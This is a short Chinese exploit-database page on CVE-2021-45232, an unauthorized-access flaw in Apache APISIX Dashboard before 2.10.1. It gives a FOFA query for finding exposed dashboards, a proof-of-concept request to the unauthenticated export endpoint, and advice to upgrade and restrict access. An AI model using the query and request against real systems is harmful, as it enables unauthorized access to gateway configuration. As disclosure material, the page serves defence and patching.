Share
## https://sploitus.com/exploit?id=F0B022B7-C762-5965-B562-AD7B3EEACCE4
# Apache APISIX Dashboard未授权访问漏洞(CVE-2021-45232)

## FOFA 查询

title="Apache APISIX Dashboard"

## 影响范围

Apache APISIX Dashboard < 2.10.1

## POC:


```IP:PORT/apisix/admin/migrate/export
IP:PORT/apisix/admin/migrate/export
```

![image](https://github.com/pingpongcult/CVE-2021-4523/blob/main/CVE-2021-45232.png)

## 修复建议
- 升级至最新安全版本 Apache APISIX Dashboard 2.10.1:https://github.com/apache/apisix-dashboard/releases/tag/v2.10.1

- 修改默认用户名和密码,并配置访问 Apache APISIX Dashboard的白名单。


## 参考链接

https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/